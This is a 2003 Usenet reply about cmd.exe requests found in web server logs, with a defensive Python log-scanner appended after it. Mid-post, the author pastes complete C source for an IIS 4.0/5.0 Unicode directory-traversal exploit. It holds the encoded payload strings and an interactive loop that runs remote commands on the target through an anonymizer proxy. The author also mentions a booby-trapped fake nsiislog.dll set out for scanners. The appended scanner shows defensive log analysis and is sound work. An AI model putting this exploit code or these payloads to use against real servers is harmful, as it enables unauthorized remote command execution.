Re: Is someone trying to hack my Web Host?
From: jayjwa (jayjwa_at_hotspam.microsoftsux.suk)
Date: 10/12/03
Date: Sun, 12 Oct 2003 02:09:14 +0000
Randell D. wrote:
> <wilkinsb1971@yahoo.com> wrote in message
> news:a6785bda.0310061004.4a7c5dbe@posting.google.com...
>
>>I was looking through the raw log files to see who's visiting my
>>personal Web site and noticed this entry:
>>
>>63.198.115.243 - - [06/Oct/2003:08:08:39 -0700] "GET
>>/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
>>
>>Why would anyone be looking for cmd.exe? Is someone trying to hack my
>>host or my site? This wouldn't work anyway because my host uses
>>RedHat. I'm just curious as to why someone would be looking for
>>cmd.exe.
cmd.exe is like our /bin/sh, cmd.exe? dir is usually the first way
someone will test if the exploit is going to work. If I'm not mistaken,
it should dump a file list. There's one for nsiislog.dll too. I made a
copy of something and named it "nsiislog.dll" and even put it in a bogus
"scripts" directory. Any time anyone would GET /scripts/ on me, they'd
really "get" scripts!!
>>
>>Thanks,
>>Brian Wilkins
>
>
> I have a small Apache server and it gets hit by similar log entries every
> few minutes. It's got worse within the past month - previously it was twice
> an hour, now though it is as much as six to eight times an hour (sometimes
> more), making me believe that some folks who have their machine switched off
> during the day switch on (and activate the worm) when surfing during the
> evening. It's a scary thought - but I'm glad I stuck with Unix/Linux and not
> Microsoft years ago as I'd hate to think how I would manage with a Microsoft
> web server at home connected to the net.
>
>
Mico$hit! the scourge of the 'Net!
This is an older MS exploit, and recently I've gotten plastered with it.
I believe it to be a script, because there doesn't seem to be any
intelligence behind it. I.e., I just moved my site from port 80 to SSL on
443 and locked down 80, now they bounce off the firewall all day. The
worst thing is, it's not coming from one place. I'm pretty visible and
run a number of services; combine that with people that get pissed off
because of things I respond with on usenet and you can see I make a few
enemies. There's always some hoser trying to login to my anon server as
"root" or "test", most times it's just funny (and sad), so I first
thought "proxy-hopper", but now I don't think so. Too bad, cuz I woulda
owned that script-kiddie by now. I'm not sure if I believe in the "switch
on, all the worms starting at once" thing, I'd bet there's more to this
than we know right now. These days exploits are widely published, and
anyone that looks can get a sample. There's still lots of vulnerable
MicroCrap servers still out there. I wish they'd just die off so that
this crap would stop. Here's what it looks like as C code, I've seen
Perl too:
/* hack IIS 4.0/5.0 with the usefull UNICODE :) and have fun */
/* coded by zipo */
#include <stdio.h>
#include <stdlib.h>      /* atoi(), exit(), system(); missing in the posted copy */
#include <string.h>
#include <strings.h>     /* bzero(); missing in the posted copy */
#include <unistd.h>      /* read(), write(), close(); missing in the posted copy */
#include <sys/socket.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>

#define BUFF_LEN 6000
#define HTTP " HTTP/1.0\r\n\r\n"
#define GET "GET http://"
/* this is the anonymous server used */
#define ANON "anon.free.anonymizer.com"
/* this are all the types of bugs */
#define BUG1_STR "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+"
#define BUG2_STR "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+"
#define BUG3_STR "/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+"
#define BUG4_STR "/"
/* this is the IIS http server port */
#define HTTP_PORT 80

int bad_params (char *prog_name);   /* defined after main(); prototype missing in the posted copy */

int main (int argc, char *argv[]) {
    struct sockaddr_in sin;
    struct hostent *he;
    char *bug, cmd[BUFF_LEN], recbuffer[BUFF_LEN], buffer[BUFF_LEN];
    int sck, i;

    if (argc < 3)
        bad_params (argv[0]);

    switch (atoi(argv[2])) {
        case 1:
            bug = BUG1_STR;
            break;
        case 2:
            bug = BUG2_STR;
            break;
        case 3:
            bug = BUG3_STR;
            break;
        case 4:
            bug = BUG4_STR;
            break;
        default:
            printf ("Number error\n");
            exit(1);
    }

    while (1) {
        printf ("bash# ");
        fgets (cmd, sizeof(cmd), stdin);
        cmd[strlen(cmd)-1] = '\0';
        if (strcmp(cmd, "exit")) {
            if (!strcmp(cmd, "clear")) {
                system("clear");
                continue;
            } else if (!strcmp(cmd, "")) {
                continue;
            } else if (!strcmp(cmd, "?")) {
                printf ("Just you need to type in the prompt the M$DOS command\n");
                printf ("to exit type \"exit\" :)\n");
                continue;
            }
            /* prepare the string to be sent */
            for (i=0;i<=strlen(cmd);i++) {
                if (cmd[i] == 0x20)
                    cmd[i] = 0x2b;
            }
            sprintf (buffer, "%s%s%s%s%s", GET, argv[1], bug, cmd, HTTP);
            /* get ip */
            if ((he = gethostbyname (ANON)) == NULL) {
                herror ("host error");
                exit (1);
            }
            /* setup port and other parameters */
            sin.sin_port = htons (HTTP_PORT);
            sin.sin_family = AF_INET;
            memcpy (&sin.sin_addr.s_addr, he->h_addr, he->h_length);
            /* create a socket */
            if ((sck = socket (AF_INET, SOCK_STREAM, 6)) < 0) {
                perror ("socket() error");
                exit (1);
            }
            /* connect to the sucker */
            if ((connect (sck, (struct sockaddr *) &sin, sizeof (sin))) < 0) {
                perror ("connect() error");
                exit (1);
            }
            /* send the beautifull string */
            write (sck, buffer, sizeof(buffer));
            /* recive all ! :) */
            read (sck, recbuffer, sizeof(recbuffer));
            /* and print it */
            recbuffer[strlen(recbuffer)-1]='\0';
            printf("\033[0;7m-------------------------------------Received-----------------------------------\n");
            printf("%s\n---------------------------------------Done-------------------------------------\n\033[7;0m",
                   recbuffer);
            /* close the socket ... not needed any more */
            close (sck);
            /* put zero's in the buffers */
            bzero (buffer, sizeof(buffer));
            bzero (recbuffer, sizeof(recbuffer));
        } else {
            /* you type "exit" cya :) */
            exit(0);
        }
    }
}

/* you miss a parameter :'-( */
int bad_params (char *prog_name) {
    fprintf (stdout, "usage:\n\t%s <hostname> <number>\n", prog_name);
    fprintf (stdout,"-------------------------------------------------------\n");
    fprintf (stdout, "<1> msadc\t");
    fprintf (stdout, "<2> scripts\t");
    fprintf (stdout, "<3> iisadmpwd\t");
    fprintf (stdout, "<4> /\n");
    fprintf (stdout,"-------------------------------------------------------\n");
    exit (1);
}
/* EOF */
Depending on who codes them, sometimes they work, sometimes not. There
are worms, of course, that use this too. Lots of variations. Maybe you will
move to https too; it doesn't go there (but could be directed there in
the above example). Anyone need their cert req. signed?! lol...
-- 
-=-=-=-=-=-=-=-=-=-=-=The New Atr2.Ath.Cx=-=-=-=-=-=-=-=-=-=-=
- jayjwa PGPKey OnSite / CA OnSite / Now w/SSL ONLY
4 Contact: jayjwa@HotSpam.com
4 All: GET /cgi-bin/ping-jay.cgi
4 Spammers: listme@listme.dsbl.org
4 Clowns: /dev/null
4 Script Kiddies: Anything in /scripts/
=-=-=-=-=-=-=-=Linux Tough.Powered By Slackware=-=-=-=-=-=-=-=
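The thread's question ("why is someone asking my Linux box for cmd.exe, and how often?") is answered on the defender's side by a log check that undoes the encodings these probes rely on. The following is an added example, not code from the original post or from anyone in the thread: it parses Apache access-log lines, percent-decodes the request path repeatedly (so `%255c` becomes `%5c` and then `\`), maps the overlong UTF-8 forms `%c0%af` and `%c1%9c` that appear in the posted probe strings, and flags paths that traverse to cmd.exe or winnt/system32. The first sample line is Brian's entry as quoted in the thread; the other lines and their 192.0.2.x addresses are constructed, and all function and constant names are my own.

```python
"""Flag IIS Unicode / double-decode traversal probes in Apache access-log lines.

Added example for this thread, not code from the original post. The first
sample line is the entry quoted in the thread; the rest are constructed
(192.0.2.0/24 is the documentation address range). Names are my own.
"""
import re
from urllib.parse import unquote_to_bytes

# Apache common-log prefix. The HTTP version is optional because the scanner
# in the quoted log line sent none.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>[^" ]+)(?: (?P<proto>[^"]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Overlong UTF-8 forms of '/' and '\' that the vulnerable IIS builds accepted;
# both appear in the probe strings posted in this thread.
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}

# '..' as a whole path component, checked after normalization
TRAVERSAL = re.compile(r"(?:^|/)\.\.(?:/|$)")
SENSITIVE = ("cmd.exe", "/winnt/system32", "nsiislog.dll")


def normalize(path, rounds=3):
    """Percent-decode repeatedly (catches %255c -> %5c -> backslash), map the
    overlong byte pairs, and fold backslashes to slashes."""
    raw = path.encode("ascii", "replace")
    for _ in range(rounds):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    for overlong, plain in OVERLONG.items():
        raw = raw.replace(overlong, plain)
    return raw.decode("latin-1").replace("\\", "/")


def classify(path):
    """Return (normalized_path, reasons); an empty reasons list means benign."""
    norm = normalize(path)
    reasons = []
    if TRAVERSAL.search(norm):
        reasons.append("traversal")
    lowered = norm.lower()
    reasons.extend(s for s in SENSITIVE if s in lowered)
    return norm, reasons


def scan(lines):
    """Parse each log line and keep the ones that look like traversal probes."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        norm, reasons = classify(m["path"])
        if reasons:
            hits.append({
                "ip": m["ip"],
                "status": int(m["status"]),
                "path": m["path"],
                "normalized": norm,
                "reasons": reasons,
            })
    return hits


def by_source(hits):
    """Probe count per client address, for the 'how often and from where' question."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


SAMPLE_LOG = [
    # the entry quoted in the thread
    '63.198.115.243 - - [06/Oct/2003:08:08:39 -0700] '
    '"GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -',
    # constructed lines from here on
    '192.0.2.10 - - [06/Oct/2003:08:10:02 -0700] "GET /index.html HTTP/1.0" 200 2326',
    '192.0.2.11 - - [06/Oct/2003:08:11:45 -0700] '
    '"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -',
    '192.0.2.11 - - [06/Oct/2003:08:11:46 -0700] '
    '"GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -',
    '192.0.2.12 - - [06/Oct/2003:08:12:30 -0700] "GET /docs/my%20notes.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(f'{h["ip"]} {h["status"]} {h["normalized"]} {h["reasons"]}')
    print(by_source(found))
```

Run it against a real access log by replacing SAMPLE_LOG with the file's lines. The 404 status on every hit is the point Brian made: an Apache host on Linux has no cmd.exe to serve, so the probes fail, but the normalized path and the per-source count still tell you which addresses are running the scanner and how often, which is what you need for a firewall rule or an abuse report.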